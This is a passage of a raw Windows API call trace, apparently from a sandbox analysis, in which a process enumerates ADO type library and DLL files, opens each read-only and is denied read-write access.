ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x41cc3017, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11600, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msado27.tlb", cAlternateFileName="")) returned 1 [0088.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0088.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0088.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35110 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.136] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35110 | out: hHeap=0x20000) returned 1 [0088.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0088.136] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0088.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0088.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a238 [0088.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0088.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0088.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a238 | out: hHeap=0x20000) returned 1 [0088.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.137] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.137] AreFileApisANSI () returned 1 [0088.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb", lpUsedDefaultChar=0x0) returned 53 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0088.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.137] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0088.137] AreFileApisANSI () returned 1 [0088.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.137] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0088.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 53 [0088.137] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.139] GetFileType (hFile=0x348) returned 0x1 [0088.139] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.139] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.139] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.139] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.139] CloseHandle (hObject=0x348) returned 1 [0088.145] AreFileApisANSI () returned 1 [0088.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0088.145] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb") returned 53 [0088.145] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado27.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado27.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.145] GetLastError () returned 0x5 [0088.145] GetLastError () returned 0x5 [0088.145] SetLastError (dwErrCode=0x5) [0088.145] GetLastError () returned 0x5 [0088.145] SetLastError (dwErrCode=0x5) [0088.145] GetLastError () returned 0x5 [0088.145] SetLastError (dwErrCode=0x5) [0088.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0088.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0088.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.145] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0088.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.145] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.145] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c6f28a5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4c6f28a5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4c6f28a5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msado28.tlb", cAlternateFileName="")) returned 1 [0088.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.145] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ae18 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ae18 | out: hHeap=0x20000) returned 1 [0088.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0088.146] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0088.146] AreFileApisANSI () returned 1 [0088.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb", lpUsedDefaultChar=0x0) returned 53 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0088.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.146] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.146] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0088.147] AreFileApisANSI () returned 1 [0088.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.147] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75be8 [0088.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75be8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 53 [0088.147] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.147] GetFileType (hFile=0x348) returned 0x1 [0088.147] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0088.147] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.147] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.147] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.148] CloseHandle (hObject=0x348) returned 1 [0088.148] AreFileApisANSI () returned 1 [0088.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.148] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0088.148] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb") returned 53 [0088.148] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado28.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.148] GetLastError () returned 0x5 [0088.148] GetLastError () returned 0x5 [0088.148] SetLastError (dwErrCode=0x5) [0088.148] GetLastError () returned 0x5 [0088.148] SetLastError (dwErrCode=0x5) [0088.148] GetLastError () returned 0x5 [0088.148] SetLastError (dwErrCode=0x5) [0088.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0088.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0088.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.148] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0088.148] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.148] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.148] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c6f28a5, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x4c6f28a5, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x4c6f28a5, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x11400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msado60.tlb", cAlternateFileName="")) returned 1 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8a368 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0088.149] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.149] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.149] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.149] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0088.149] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0088.149] AreFileApisANSI () returned 1 [0088.149] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb", lpUsedDefaultChar=0x0) returned 53 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0088.149] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.149] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.149] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0088.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0088.150] AreFileApisANSI () returned 1 [0088.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.150] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75cd8 [0088.150] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb") returned 53 [0088.150] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0088.151] GetFileType (hFile=0x348) returned 0x1 [0088.151] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0088.151] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0088.151] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0088.151] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0088.152] CloseHandle (hObject=0x348) returned 1 [0088.152] AreFileApisANSI () returned 1 [0088.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0088.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75fa8 [0088.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb") returned 53 [0088.152] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\System\\ado\\msado60.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msado60.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0088.152] GetLastError () returned 0x5 [0088.152] GetLastError () returned 0x5 [0088.152] SetLastError (dwErrCode=0x5) [0088.152] GetLastError () returned 0x5 [0088.152] SetLastError (dwErrCode=0x5) [0088.152] GetLastError () returned 0x5 [0088.152] SetLastError (dwErrCode=0x5) [0088.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0088.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0088.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0088.152] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0088.152] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.152] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0088.152] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x463fb128, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xd005e363, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x463fb128, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x58e00, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="msadomd.dll", cAlternateFileName="")) returned 1 [0088.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0088.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0088.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0088.152] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0088.153] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0088.153] HeapFree (in: 